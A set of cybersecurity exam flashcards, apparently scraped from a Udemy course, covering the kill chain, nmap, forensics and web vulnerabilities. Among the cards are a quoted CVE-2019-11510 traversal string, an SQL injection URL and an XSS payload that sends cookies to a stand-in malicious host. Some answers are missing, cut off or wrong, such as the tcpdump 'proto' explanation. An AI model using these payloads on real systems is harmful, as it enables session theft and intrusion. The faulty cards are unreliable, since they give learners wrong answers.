Udemy Exam 1 Flashcards

1
Q

In the infamous Equifax data breach, which phase of the Cyber Kill Chain was represented when the attackers exploited the Apache Struts vulnerability to gain access to Equifax’s system?

A

The exploitation of the Apache Struts vulnerability to gain access to Equifax’s system represents the Exploitation phase of the Cyber Kill Chain. Reconnaissance is about gathering information about the target system, not executing a payload. Weaponization is the phase where the payload is created. Actions and Objectives is when the attacker fulfills their intent, not exploiting a vulnerability.

2
Q

In the context of incident response, why is the metric ‘Mean Time to Remediate’ important?

A

The ‘Mean Time to Remediate’ metric provides an indication of how efficiently an organization can respond to and resolve security incidents, which is vital for evaluating and improving incident response capabilities.

3
Q

A data breach has occurred in your company. It is determined that customer information was compromised, leading to a loss of trust among your client base. What type of communication would be most suitable to manage this crisis?

A

While important in its own right, legal communication primarily deals with the legal aspects of the incident and isn’t directly concerned with managing customer relationships.

4
Q

You are conducting a review of a VPN device’s logs and found the following URL being accessed:

https://sslvpn/dana-na/../diontraining/html5acc/teach/../../../../../../etc/passwd?/diontraining/html5acc/teach/

Based upon this log entry alone, which of the following most likely occurred?

A

The exact string used here was the attack string used in CVE-2019-11510 to compromise thousands of VPN servers worldwide using a directory traversal approach. However, its presence in the logs does not prove that the attack was successful, only that it was attempted. To verify that the attacker successfully downloaded the /etc/passwd file, a cybersecurity analyst would require additional information and correlation. If the server utilizes proper input validation on URL entries, then the directory traversal would be prevented. As no SQL or XML language elements are present, this is definitely not an SQL or XML injection attack.

5
Q

Which of the following will an adversary do during the exploitation phase of the Lockheed Martin kill chain? (SELECT THREE)

A backdoor/implant is placed on a victim’s client

Wait for a user to click on a malicious link

Select backdoor implant and appropriate command and control infrastructure for operation

Take advantage of a software, hardware, or human vulnerability

A webshell is installed on a web server

Wait for a malicious email attachment to be opened

A

During the exploitation phase, the attacker's actions are conducted directly against the target's system. Taking advantage of or exploiting an accessible vulnerability, waiting for a malicious email attachment to be opened, or waiting for a user to click on a malicious link are all part of the exploitation phase. The installation of a web shell, backdoor, or implant is performed during the installation phase. Selecting a backdoor implant and appropriate command and control infrastructure occurs during the weaponization phase.

6
Q

Which of the following are valid concerns when migrating to a serverless architecture? (SELECT THREE)

Dependency on the cloud service provider

Limited disaster recovery options

Protection of endpoint security

Management of VPC offerings

Patching of the backend infrastructure

Management of physical servers

A

Serverless is a modern design pattern for service delivery. With serverless, all the architecture is hosted within a cloud, but unlike “traditional” virtual private cloud (VPC) offerings, services such as authentication, web applications, and communications aren’t developed and managed as applications running on servers located within the cloud. Instead, the applications are developed as functions and microservices, each interacting with other functions to facilitate client requests. There is a heavy dependency on the cloud service provider in a serverless architecture system since all of the back-end infrastructure’s patching and management functions are done by them. An organization using such an architecture would still need to prevent compromise of the user endpoints, though the cloud service provider does not manage these. Another concern with serverless architectures is that there are limited options for disaster recovery if service provisioning fails. Patching of backend infrastructure is eliminated because the infrastructure is eliminated with serverless architectures. Once migration is complete, there are no physical servers to manage, which reduces the workload on your system administration teams.

7
Q

Which of the following techniques would best mitigate malware that utilizes a fast flux network for its command and control infrastructure?

Utilize a secure recursive DNS resolver to a third-party secure DNS resolver

Blacklisting known malicious domain names

Blacklisting known malicious IP addresses

Conduct detailed statistical analysis of the structure of domain names to detect anomalies

A

Third-party DNS resolvers, particularly those of ISPs, will typically have elaborate algorithms designed to detect command and control (C2) via fast flux networks. Fast flux DNS utilizes a technique that rapidly changes the IP address associated with a domain to allow an adversary to defeat IP-based blacklists. Often, these fast flux networks have communication patterns that might be detectable, though. While in-house statistical analysis might be possible (and could be done in parallel), the commercial resources available to a large scale ISP or dedicated secure DNS providers will be better tailored to combatting this issue.

8
Q

A penetration tester has been hired to conduct an assessment, but the company wants to exclude social engineering from the list of authorized activities. Which of the following documents would include this limitation?

Memorandum of understanding

Service level agreement

Rules of engagement

Acceptable use policy

A

While the contract documents’ network scope will define what will be tested, the rules of engagement define how that testing is to occur. Rules of engagement can state things like no social engineering is allowed, no external website scanning, etc. A memorandum of understanding (MOU) is a preliminary or exploratory agreement to express an intent to work together that is not legally binding and does not involve monetary exchange. A service level agreement contains the operating procedures and standards for a service contract. An acceptable use policy is a policy that governs employees’ use of company equipment and internet services.

9
Q

A cybersecurity analyst is analyzing an employee’s workstation that is acting abnormally. The analyst runs the netstat command and reviews the following output:

Proto Local Address Foreign Address State

TCP 0.0.0.0:53 0.0.0.0:0 LISTENING

TCP 0.0.0.0:135 0.0.0.0:0 LISTENING

TCP 0.0.0.0:445 0.0.0.0:0 LISTENING

TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING

TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT

TCP 192.168.1.4:59393 74.125.224.39:443 ESTABLISHED

TCP 192.168.1.4:59515 208.50.77.89:80 ESTABLISHED

TCP 192.168.1.4:59518 69.171.227.67:443 ESTABLISHED

TCP 192.168.1.4:59522 96.16.53.227:443 ESTABLISHED

TCP 192.168.1.4:59523 96.16.53.227:443 ESTABLISHED

TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED

TCP 192.168.1.4:59538 74.125.224.98:80 ESTABLISHED

TCP 192.168.1.4:59539 74.125.224.98:80 ESTABLISHED

Based on this output, which of the following entries is suspicious? (SELECT THREE)

TCP 192.168.1.4:53 91.198.117.247:443 CLOSE_WAIT

TCP 192.168.1.4:59515 208.50.77.89:80 ESTABLISHED

TCP 0.0.0.0:53 0.0.0.0:0 LISTENING

TCP 192.168.1.4:59518 69.171.227.67:443 ESTABLISHED

TCP 0.0.0.0:135 0.0.0.0:0 LISTENING

TCP 192.168.1.4:53 208.71.44.30:80 ESTABLISHED

A

While we cannot be certain that any malicious activity is ongoing based solely on this netstat output, the three entries concerning port 53 are suspicious and should be further investigated. Port 53 is used by DNS servers to receive requests, and an employee’s workstation running a DNS server would be unusual. If the Foreign Address were using port 53, this would indicate the workstation was conducting a normal DNS lookup, but based on the network traffic direction, this is not the case. The entry that is listening on port 135 is not suspicious for a Windows workstation since this is used to conduct file sharing across a local Windows-based network with NetBIOS. The entries from a random high-numbered port to a web server (port 80 and port 443) are normal network traffic. The web server listens on a well-known or reserved port (port 80 and port 443) and then responds to the random high-numbered port chosen by the workstation to conduct two-way communications.

10
Q

Which of the following automatically combines multiple disparate sources of information to form a complete picture of events for analysts to use during an incident response or when conducting proactive threat hunting?

Machine learning

Deep learning

Continuous integration

Data enrichment

A

When data enrichment occurs, it could combine a threat intelligence feed with a log of NetFlow. This will allow the analyst to know if an IP address of interest is actually associated with a known APT. Machine learning and deep learning are forms of artificial intelligence that may be used to conduct data enrichment activities, but individually they are not sufficient to answer this question. Continuous integration is a software development method in which code updates are tested and committed to development or build server/code repositories rapidly, and is unrelated to this question.

11
Q

Your organization is concerned about potential leaks of sensitive data. Which technology should be deployed to identify and prevent unauthorized access to such data?

DLP
Anti-virus
Encryption
Firewalls

A

Data Loss Prevention (DLP) solutions play a crucial role in protecting an organization’s sensitive information from unauthorized exposure. By identifying critical data, monitoring how it moves and is used across the network, and preventing unsanctioned access or transmission, DLP tools offer comprehensive protection against data breaches. These technologies can mitigate risks from both internal and external threats, safeguarding data whether it’s at rest, in use, or in transit. While firewalls can prevent unauthorized network access, they do not specifically identify or protect sensitive data like DLP does. Anti-virus software primarily focuses on identifying and removing malware and doesn’t offer specific protections for sensitive data like DLP. Encryption can secure data in transit or at rest but doesn’t actively identify or prevent unauthorized access to sensitive data like DLP.

12
Q

What command should a forensic analyst use to make a forensic disk image of a hard drive?

touch

dd

rm

wget

A

The dd tool is used to make bit-by-bit copies of a disk, drive, or partition. Once the image is created using dd, a hash of the file should be made and placed into evidence to validate the integrity of the disk image that was created. This will ensure that no modification occurs between the collection and analysis of the disk image. The wget command is a command-line utility for downloading files from the Internet. The touch command is a standard UNIX/Linux command used to create files and to change or modify a file’s timestamps. The rm command is used to delete one or more files or directories.

13
Q

Which of the following is NOT one of the main criteria included in a penetration testing plan?

Scope
Timing
Authorization
Account credentials

A

The three main criteria that should be included in a penetration testing plan are timing, scope, and authorization. Account credentials are usually provided during a white box test or vulnerability assessment, but usually not for a penetration test.

14
Q

Which of the following is the leading cause for cross-site scripting, SQL injection, and XML injection attacks?

A

Faulty input validation

The primary vector for attacking applications is to exploit faulty input validation. The input could include user data entered into a form or URL, or data passed by another application or link. This is heavily exploited by cross-site scripting, SQL injection, and XML injection attacks. Directory traversal is the practice of accessing a file from a location that the user is unauthorized to access. The attacker does this by ordering an application to backtrack through the directory path to read or execute a file in a parent directory. In a file inclusion attack, the attacker adds a file to a web app or website’s running process. The file is either constructed to be malicious or manipulated to serve the attacker’s malicious purposes. Cross-site scripting (XSS) is one of the most powerful input validation exploits. XSS involves a trusted site, a client browsing the trusted site, and the attacker’s site.

15
Q

Referencing the infamous WannaCry ransomware attack, where the attackers exploited a vulnerability in Microsoft’s SMB protocol using an NSA tool known as EternalBlue, which phase of the Cyber Kill Chain was the usage of EternalBlue part of?

Actions and Objectives
Command and Control
Delivery
Weaponization

A

In the context of the WannaCry ransomware attack, the NSA tool, EternalBlue, was used during the weaponization phase to exploit a known vulnerability in Microsoft’s SMB protocol. The delivery phase involves the transmission of the malicious payload to the victim, not the creation of it. Command and control refers to the phase where the attacker establishes a channel to control the compromised system. The Actions and Objectives phase would be when the attackers actually encrypted the files and demanded the ransom.

16
Q

Which phase of the Cyber Kill Chain involves the attacker maintaining communication with the compromised system to facilitate data exfiltration or further exploitation?

A

The Command and Control phase of the Cyber Kill Chain involves maintaining communication with the compromised system. Weaponization involves creating a malicious payload, not maintaining communication with the compromised system. Delivery involves transmitting the weaponized payload to the victim, not maintaining communication with the compromised system. Exploitation involves taking advantage of a vulnerability in the system or application to execute the payload, not maintaining communication with the compromised system.

17
Q

Which of the following scan types are useful for probing firewall rules?

XMAS TREE
TCP SYN
TCP ACK
TCP RST

A

TCP ACK scans can be used to determine what services are allowed through a firewall. An ACK scan sends TCP packets with only the ACK bit set. Whether ports are open or closed, the target is required to respond with an RST packet. Firewalls that block the probe usually make no response or send back an ICMP destination unreachable error. This distinction allows Nmap to report whether the ACK packets are being filtered. A TCP SYN scan can sometimes be used to determine what ports are filtered. Still, if the firewall is configured to drop packets for disallowed ports instead of sending an RST packet, then a TCP SYN scan will not be able to determine if a firewall was there or if the port was simply unavailable. A target sends a TCP RST packet in response to a TCP ACK scan, but a TCP RST is not a valid type of scan itself. An XMAS Tree scan will set the FIN, PSH, and URG flags in the TCP packet. This is a noisy type of scan and not useful for probing firewall rules.

18
Q

Which of the protocols listed is NOT likely to trigger a vulnerability scan alert when used to support a virtual private network (VPN)?

A

IPSec is the most secure protocol that works with VPNs. The use of PPTP and SSL is discouraged for VPN security. Due to this, PPTP and SSL for a VPN will likely alert during a vulnerability scan as an issue to be remediated.

19
Q

If an attacker can compromise an Active Directory domain by utilizing an attack to grant administrative access to the domain controllers for all domain members, which type of attack is being used?

Pass the hash
Golden ticket
Lateral movement
Pivoting

A

A golden ticket is a Kerberos ticket that can grant other tickets in an Active Directory environment. Attackers who can create a golden ticket can use it to grant administrative access to other domain members, even to domain controllers. Pass the Hash (PtH) is the process of harvesting an account’s cached credentials when the user logs in to a single sign-on (SSO) system. This would then allow the attacker to use the credentials on other systems, as well. Lateral movement is an umbrella term for a variety of attack types. Attackers can extend their lateral movement by a great deal if they can compromise host credentials. Pivoting is a process similar to lateral movement. When attackers pivot, they compromise one central host (the pivot) that allows them to spread out to other hosts that would otherwise be inaccessible.

20
Q

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL,

http://test.diontraining.com/index.php?id=1%20OR%2017-7%3d10.

What type of attack has likely occurred?

Session hijacking
XML injection
SQL injection
Buffer overflow

A

This is an example of a Boolean-based SQL injection. This occurs when data input by a user is interpreted as a SQL command rather than as normal data by the backend database. In this example, notice that the statement being parsed as part of the URL after the equal sign is equivalent to 1 or 17-7=10. This means the portion of the statement that is 17-7=10 would return a value of 1 (since it is true). Then, we are left to compute if 1 = 1, and since it does, the SQL database will treat this as a positive authentication. This is simply an obfuscation technique of a 1=1 SQL injection technique.

A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer’s boundary to overwrite an adjacent memory location.

A session hijacking attack consists of exploiting the web session control mechanism, normally managed for a session token.

XML Injection is an attack technique used to manipulate or compromise an XML application or service’s logic.

21
Q

Which of the following protocols could be used inside a virtual system to manage and monitor the network?

EIGRP
SNMP
BGP
SMTP

A

SNMP is used to monitor and manage networks, both physical and virtual. SMTP is used for email. BGP and EIGRP are used for routing network data.

22
Q

Which of the following tools is useful for capturing Windows memory data for forensic analysis?

Memdump
dd
Wireshark
Nessus

A

The Memdump, Volatility framework, DumpIt, and EnCase are examples of Windows memory capture tools for forensic use. The dd tool is used to conduct forensic disk images. Wireshark is used for packet capture and analysis. Nessus is a commonly used vulnerability scanner.

23
Q

Jorge is working with an application team to remediate a critical SQL injection vulnerability on a public-facing server. The team is worried that deploying the fix will require several hours of downtime and block customer transactions from being completed by the server. Which of the following is the BEST action for Jorge to recommend?

Schedule an emergency maintenance for an off-peak time later in the day to remediate the vulnerability

Wait until next scheduled maintenance window to remediate the vulnerability

Delay the remediation until the next major update of the SQL server occurs

Remediate the vulnerability immediately

A

Jorge should recommend that emergency maintenance windows be scheduled for an off-peak time later in the day. Since the vulnerability is critical, it needs to be remediated or mitigated as quickly as possible. But, this also needs to be balanced against the business and operational needs. Therefore, we cannot simply remediate it immediately, as this would cause downtime for this public-facing server. It is also unreasonable to accept the risk until the next scheduled maintenance window since it is a critical vulnerability. Therefore, the best way to balance the risk of the vulnerability and the outage’s risk is to schedule an emergency maintenance window and patch the server during that time.

24
Q

The 2014 Heartbleed bug was a serious vulnerability in OpenSSL. Which OpenSSL version was released to fix the Heartbleed bug?

A

OpenSSL 1.0.1g

This is the version of OpenSSL that addressed the notorious Heartbleed bug, thus patching the vulnerability and securing the SSL/TLS communication.

25
Q

The management at Steven’s work is concerned about rogue devices being attached to the network. Which of the following solutions would quickly provide the most accurate information that Steve could use to identify rogue devices on a wired network?

Router and switch-based MAC address reporting

A discovery scan using a port scanner

A physical survey

Reviewing a central administration tool like a SCCM

A

The best option is MAC address reporting from a source device like a router or a switch. If the company uses a management system or inventory process to capture these addresses, then a report from one of these devices will show what is connected to the network even when they are not currently in the inventory. This information could then be used to track down rogue devices based on the physical port connected to a network device.

26
Q

What describes the infrastructure needed to support the other architectural domains in the TOGAF framework?

Technical architecture
Business architecture
Applications architecture

A

TOGAF is a prescriptive framework that divides the enterprise architecture into four domains. Technical architecture describes the infrastructure needed to support the other architectural domains. Business architecture defines governance and organization and explains the interaction between enterprise architecture and business strategy. Applications architecture includes the applications and systems an organization deploys, the interactions between those systems, and their relation to the business processes. Data architecture provides the organization’s approach to storing and managing information assets. This question may seem beyond the scope of the exam. Still, the objectives allow for “other examples of technologies, processes, or tasks about each objective may also be included on the exam although not listed or covered” in the objectives’ bulletized lists. The exam tests the equivalent of 4 years of hands-on experience in a technical cybersecurity job role. The content examples listed in the objectives are meant to clarify the test objectives and should not be construed as a comprehensive listing of this examination’s content. Therefore, questions like this are fair game on test day. That said, your goal isn’t to score 100% on the exam; it is to pass it. Don’t let questions like this throw you off on test day. If you aren’t sure, take your best guess and move on!

27
Q

When trying to thoroughly examine the security posture of a major e-commerce platform, which framework serves as an exhaustive guide dedicated explicitly to this purpose?

Diamond Model of Intrusion Analysis

OWASP Testing Guide

MITRE ATT&CK

Open Source Security Testing Methodology Manual (OSS TMM)

A

While the OSSTMM does provide a structured approach to security testing, it is more general in its application, encompassing different areas such as applications, networks, and systems, rather than focusing specifically on web applications.

28
Q

Which protective feature is used to prevent a buffer overflow attack from specific applications by randomizing where a program’s components are run from in memory?

ASLR
DLL
DLP
DEP

A

ASLR randomizes where components of a running process (such as the base executable, APIs, and the heap) are placed in memory, which makes it more difficult to conduct a buffer overflow at specific points in the address space. The Windows Data Execution Prevention (DEP) feature protects processes against exploits that try to execute code from a writable memory area (stack/heap). Windows DEP prevents code from being run from a non-executable memory region. Data loss prevention (DLP) software detects potential data breaches/data exfiltration transmissions and prevents them by monitoring, detecting, and blocking sensitive data while in use, in motion, and at rest. A dynamic link library (DLL) is a library that contains code and data that can be used by more than one program at the same time.

29
Q

Which of the following technologies could be used to ensure that users who log in to a network are physically in the same building as the network they are attempting to authenticate on? (SELECT TWO)

Port security
GPS location
NAC
Geo-IP

A

Network Access Control is used to identify an endpoint’s characteristics when conducting network authentication. The GPS location of the device will provide the longitude and latitude of the user, which could be compared against the GPS coordinates of the building. Port security enables an administrator to configure individual switch ports to allow only a specified number of source MAC addresses ingressing the port. This would not help to locate the individual based on their location, though. Geo-IP, or geolocation and country lookup of a host based on its IP address, would identify the country of origin of the user, but not whether they are within the building’s confines. Geo-IP is also easily tricked if the user logs in over a VPN connection.

30
Q

FISMA

A

The Federal Information Security Management Act (FISMA) is a United States federal law that defines a comprehensive framework to protect government information, operations, and assets against natural or human-made threats. FISMA requires that government agencies and other organizations that operate systems on behalf of government agencies comply with security standards. The Health Insurance Portability and Accountability Act (HIPAA) is a United States federal law designed to provide privacy standards to protect patients’ medical records and other health information provided to health plans, doctors, hospitals, and other health care providers. The Children’s Online Privacy Protection Act (COPPA) is a United States federal law that imposes certain requirements on operators of websites or online services directed to children under 13 years of age and on operators of other websites or online services that have actual knowledge that they are collecting personal information online from a child under 13 years of age. Sarbanes–Oxley (SOX) is a United States federal law that set new or expanded requirements for all U.S. public company boards, management, and public accounting firms.

31
Q

nmap -sT

A

The nmap TCP connect scan (-sT) is used when the SYN scan

You should use the -sT flag when you do not have raw packet privileges on your workstation or if you are scanning an IPv6 network.

This flag tells nmap to establish a connection with the target machine by issuing the connect system call instead of directly using a SYN scan.

32
Q

nmap -sS

A

Normally, a fast scan using the -sS (SYN scan) flag is more often conducted, but it requires raw socket access on the scanning workstation.

33
Q

nmap -sX

A

The -sX flag would conduct an Xmas scan, where the FIN, PSH, and URG flags are set in the scan packets.

34
Q

nmap -O

A

The -O flag would conduct an operating system detection scan of the target system.

35
Q

A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URLs:

https://test.diontraining.com/profile.php?userid=1546

https://test.diontraining.com/profile.php?userid=5482

https://test.diontraining.com/profile.php?userid=3618

What type of vulnerability does this website have?

Weak or default configurations

Improper error handling
Race condition

Insecure direct object reference

A

Insecure direct object references (IDOR) are a cybersecurity issue that occurs when a web application developer uses an identifier for direct access to an internal implementation object but provides no additional access control and/or authorization checks. An attacker could change the userid number and directly access any user’s profile page in this scenario. A race condition is a software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events. Those events fail to execute in the order and timing intended by the developer. Weak or default configurations are commonly a result of incomplete or ad-hoc configurations, open cloud storage, misconfigured HTTP headers, unnecessary HTTP methods, permissive Cross-Origin resource sharing (CORS), and verbose error messages containing sensitive information. Improper handling of errors can reveal implementation details that should never be revealed, such as detailed information that can provide hackers important clues on the system’s potential flaws.

36
Q

After a major ransomware attack on your organization, a comprehensive review process is initiated. This review involves dissecting the incident to identify what went wrong, what went well, and what steps can be taken to prevent such an event from happening again in the future. What is the term used for this critical part of the post-incident phase?

Tabletop exercise
Forensic analysis
Root cause analysis
Lessons learned

A

The lessons learned process involves a thorough review of an incident, with the goal of improving future incident responses by identifying what was done well and what needs to be improved. Forensic analysis is a detailed investigation of an incident to understand its origin, extent, and impact. While it can inform lessons learned, it does not itself represent the comprehensive review process aimed at improving future responses. Root cause analysis seeks to identify the origin of an incident, but does not involve a broad review of the incident response process with the aim of improving future responses. Tabletop exercises are a part of the preparation phase of the incident management lifecycle and are used to test the effectiveness of an organization’s incident response plan. They do not involve reviewing past incidents to improve future responses.

37
Q

An adversary compromises a web server in your network using a zero-day exploit and then uses it as a command and control (C2) server for further attacks. Which stage of the MITRE ATT&CK framework does the use of a C2 server illustrate?

Command and Control
Impact
Persistence
Exploitation

A

In the MITRE ATT&CK framework, Command and Control is a stage that describes how an adversary communicates with systems under their control within a target network. Exploitation is part of gaining initial access but does not describe the use of compromised systems for command and control. Persistence involves methods an adversary might use to maintain access within a network, but doesn’t represent the use of a C2 server. Impact describes the objective of the adversary, often disruptive actions like data destruction or defacement. The use of a C2 server is not an impact action.

38
Q

Which of the following security policies could help detect fraudulent cases that occur even when other security controls are already in place?

Dual control
Separation of duties
Mandatory vacations
Least privilege

A

Mandatory vacation policies require employees to take time away from their job and help to detect fraud or malicious activities. Even if other controls such as separation of duties, least privilege, and dual control are used, an employee could collude with others to conduct fraud. By utilizing mandatory vacation policies, this fraud can often be discovered since a new person will be conducting the duties assigned to the person on vacation. Separation of duties is the concept of having more than one person required to complete a particular task to prevent fraud and error. Dual control, instead, requires both people to act together. For example, a nuclear missile system uses dual control and requires two people to each turn a different key simultaneously to allow for a missile launch to occur. Least privilege is the concept and practice of restricting access rights for users, accounts, and computing processes to only those resources absolutely required to perform routine, legitimate activities.

39
Q

You are conducting threat hunting on your organization’s network. Every workstation on the network uses the same configuration baseline and contains a 500 GB HDD, 4 GB of RAM, and the Windows 10 Enterprise operating system. You know from previous experience that most of the workstations only use 40 GB of space on the hard drives since most users save their files on the file server instead of the local workstation. You discovered one workstation that has over 250 GB of data stored on it. Which of the following is a likely hypothesis of what is happening, and how would you verify it?

The host might be the victim of a remote access trojan – you should reimage the machine immediately

The host might be used as a staging area for data exfiltration – you should conduct volume-based trend analysis on the host’s storage device

The host might be used as a command and control node for a botnet – you should immediately disconnect the host from the network

The host might be offline and conducting backups locally – you should contact a system administrator to have it analyzed

A

Based on your previous experience, you know that most workstations only store 40 GB of data. Since client workstations don’t usually need to store data locally, and you noticed that a host’s disk capacity has suddenly diminished, you believe it could indicate that it is used to stage data for exfiltration. To validate this hypothesis, you should configure monitoring and conduct volume-based trend analysis to see how much data is added over the next few hours or days. If you suspect the machine is the victim of a remote access trojan, you should not reimage it immediately. By reimaging the host, you would lose any evidence or the ability to confirm your hypothesis. Based on the scenario, you have no evidence that the system is offline or conducting backups locally. If you did suspect this, you could confirm it by checking the network connectivity or analyzing the files stored on the system. If you suspect the host is being used as a command and control (C2) node for a botnet, you should conduct network monitoring to validate your hypothesis before disconnecting the host from the network. If the host were a C2 node, that would not explain the excessive use of disk space observed.

40
Q

Which of the following is the correct usage of the tcpdump command to create a packet capture filter for all traffic going to and from the server located at 10.10.1.1?

tcpdump -i eth0 src 10.10.1.1

tcpdump -i eth0 host 10.10.1.1

tcpdump -i eth0 proto 10.10.1.1

tcpdump -i eth0 dst 10.10.1.1

A

Knowing tcpdump is an essential skill that will come in handy for any system administrator, network engineer, or security professional. The tcpdump tool is used to conduct packet capturing of network traffic. The host option specifies a filter to capture all traffic going to (destination) and from (source) the designated IP address. If the dst filter is used, this only captures data going to the designated IP address. If the src filter is used, this only captures data going from the designated IP. If the proto filter is used, this will capture all traffic going to or from a designated port, such as FTP if proto 21 was used.

41
Q

Rory is about to conduct forensics on a virtual machine. Which of the following processes should be used to ensure that all of the data is acquired forensically?

Suspend the machine and copy the contents of the directory it resides in

Perform a live acquisition of the virtual machine’s memory

Suspend the machine and make a forensic copy of the drive it resides on

Shut down the virtual machine and make a forensic copy of its disk image

A

The best option is to suspend the machine and copy the directory contents as long as you ensure you protect the integrity of the files by conducting a hash on them before and after copying the files. This procedure will store the virtual machine’s RAM and disk contents. Since a virtual machine stores all of its data in a single file/folder on a host’s hard drive, you can copy the entire virtual hard drive by copying the file/folder from the host operating system (such as Windows), and this will give you all the information needed for your analysis. The virtual machine should not be powered off to create a copy of the drive since it could alter the files in the virtual disk image during the shutdown process. Live acquisition relies on a specialist hardware or software tool that can capture memory contents while the computer is running. This is unnecessary for a virtual machine since suspending a virtual machine writes the entire memory contents to a file on the hard disk. Shutting down the machine is a bad idea since this runs the risk that the malware will detect the shutdown process and perform anti-forensics to remove traces of itself. While you could image the entire drive the virtual machine resides on, it is unnecessary, will take much longer, and requires you to shut down the host machine to conduct the bit-by-bit copy.

42
Q

During your annual cybersecurity awareness training in your company, the instructor states that employees should be careful about what information they post on social media. According to the instructor, if you post too much personal information on social media, such as your name, birthday, hometown, and other personal details, it is much easier for an attacker to conduct which type of attack to break your passwords?

Rainbow table attack

Birthday attack

Brute force attack

Cognitive password attack

A

A cognitive password is a form of knowledge-based authentication that requires a user to answer a question, presumably something they intrinsically know, to verify their identity. If you post a lot of personal information about yourself online, this type of password can easily be bypassed. For example, during the 2008 elections, Vice Presidential candidate Sarah Palin’s email account was hacked because a high schooler used the “reset my password” feature on Yahoo’s email service to reset her password using the information that was publicly available about Sarah Palin (like her birthday, high school, and other such information).

43
Q

In the Mirai botnet attack, thousands of IoT devices, such as cameras and routers, were infected and used to launch large-scale DDoS attacks. In the Diamond Model of Intrusion Analysis, what do these IoT devices represent?

Capability
Infrastructure
Adversary
Victim

A

In the Diamond Model of Intrusion Analysis, the infected IoT devices used in the Mirai botnet attack represent the Infrastructure. The Adversary is the entity conducting the attack, not the resources used in the attack. The Victim is the target of the attack, not the resources used in the attack. Capability refers to the tools and techniques used in the attack, not the resources used in the attack.

44
Q

An analyst’s vulnerability scanner did not have the latest set of signatures installed. Due to this, several unpatched servers may have vulnerabilities that were undetected by their scanner. You have directed the analyst to update their vulnerability scanner with the latest signatures at least 24 hours before conducting any scans. However, the results of their scans still appear to be the same. Which of the following logical controls should you use to address this situation?

Test the vulnerability remediations in a sandbox before deploying them into production

Create a script to automatically update the signatures every 24 hours

Configure the vulnerability scanners to run in credentialed mode

Ensure the analyst manually validates that the updates are being performed as directed

A

Since the analyst appears not to be installing the latest vulnerability signatures according to your instructions, it would be best to create a script and automate the process to eliminate human error. The script will always ensure that the latest signatures are downloaded and installed in the scanner every 24 hours without any human intervention. While you may want the analyst to manually validate that the updates were performed as part of their procedures, this is still error-prone and likely not to be conducted properly. Regardless of whether the scanners are being run in uncredentialed or credentialed mode, they will still miss vulnerabilities if using out-of-date signatures. Finally, the option to test the vulnerability remediations in a sandbox is a good suggestion. Still, it won’t solve this scenario since we are concerned with the scanning portion of vulnerability management and not remediation.

45
Q

You have just run the following commands on your Linux workstation:

DionTraining:~ root# ls
Names.txt
DionTraining:~ root# more Names.txt
DION
DIOn
DIon
Dion
dion
DionTraining:~ root# grep -i DION Names.txt

Which of the following options would be included as part of the output for the grep command issued? (SELECT ALL THAT APPLY)

Dion

DION

DIOn

dion

A

The grep (global search for regular expressions and print) command is one of Linux’s powerful search tools. The general syntax for the grep command is “grep [options] pattern [files]”. The command searches within the specified files (in this case, the Names.txt file). When the command is issued with the -i optional flag, it treats the specified pattern as case insensitive. Therefore, all uppercase and lowercase variations of the word “DION” will be found in the file and displayed as the command output. By default, grep is case sensitive, so “grep DION Names.txt” would only display “DION” and ignore the other variations. As a cybersecurity analyst, grep is one of your most important tools. You can use regular expressions (regex) to quickly find indicators of compromise within your log files using grep.

46
Q

An organization is conducting a cybersecurity training exercise. What team is Jason assigned to if he has been asked to monitor and manage the defenders’ and attackers’ technical environment during the exercise?

Blue team

White team

Red team

Purple team

A

Jason is assigned to the white team. The white team acts as the judges, enforces the rules of the exercise, observes the exercise, scores teams, resolves any problems that may arise, handles all requests for information or questions, and ensures that the competition runs fairly and does not cause operational problems for the defender’s mission. A red team is a group of people authorized and organized to emulate a potential adversary’s attack or exploitation capabilities against an enterprise’s security posture. A blue team is a group of people responsible for defending an enterprise’s use of information systems by maintaining its security posture against a group of mock attackers. The purple team is made up of both the blue and red teams to work together to maximize their cyber capabilities through continuous feedback and knowledge transfer between attackers and defenders.

47
Q

You are conducting static analysis of an application’s source code and see the following:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

(String) page += "";

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Based on this code snippet, which of the following security flaws exists in this application?

Race condition
Improper input validation
Improper error handling
Insufficient logging and monitoring

A

Based on this code snippet, the application is not utilizing input validation. This would allow a malicious user to conduct an XSS (cross-site scripting) attack. For example, an attacker could input the following for a value of “ID”:
‘>document.location= ‘http://www.malicious-website.com/cgi-bin/cookie.cgi? Foo=’+document.cookie’

This could cause the victim ID to be sent to “malicious-website.com” where additional code could be run, or the session can then be hijacked. Based on the code snippet provided, we have no indications of the level of logging and monitoring being performed, nor if proper error handling is being conducted. A race condition is a software vulnerability when the resulting outcome from execution processes is directly dependent on the order and timing of certain events. Those events fail to execute in the order and timing intended by the developer.

48
Q

You have been asked to conduct a forensic disk image on an internal 500 GB hard drive. You connect a write blocker to the drive and begin to image it using dd to copy the contents to an external 500 GB USB hard drive. Before completing the image, the tool reports that the imaging failed. Which of the following is most likely the reason for the image failure?

The data on the source drive was modified during the imaging

The data cannot be copied using the RAW format

The source drive is encrypted with BitLocker

There are bad sectors on the destination drive

A

If you have verified that the source and the target media are both the same size, then a failure has likely occurred due to bad media on the source drive or some bad sectors on the destination drive. The data can always be copied into a RAW format since it is a bit-by-bit copy and will copy even the source drive’s bad sectors. Even if the source disk were encrypted, the dd program would create a bit-by-bit copy to the destination drive for later cryptanalysis attempts. Even if the data were modified, this would not cause the copy to fail. Instead, the copy would continue and record the modified data instead of the original data.

49
Q

Which operating system feature is designed to detect malware that is loaded early in the system startup process or before the operating system can load itself?

Startup Control

Master Boot Record analytics

Measured boot

Advanced anti-malware

A

Measured boot is a feature where a log of all boot actions is taken and stored in a trusted platform module for later retrieval and analysis by anti-malware software on a remote server. Master boot record analysis is used to capture the hard disk’s required information to support a forensic investigation. It would not detect malware during the system’s boot-up process. Startup control would be used to determine which programs will be loaded when the operating system is initially booted, but this would be too late to detect malware loaded during the pre-startup and boot process. Advanced anti-malware solutions are programs that are loaded within the operating system. Therefore, they are loaded too late in the startup process to be effective against malicious boot sector viruses and other BIOS/UEFI malware variants.

50
Q

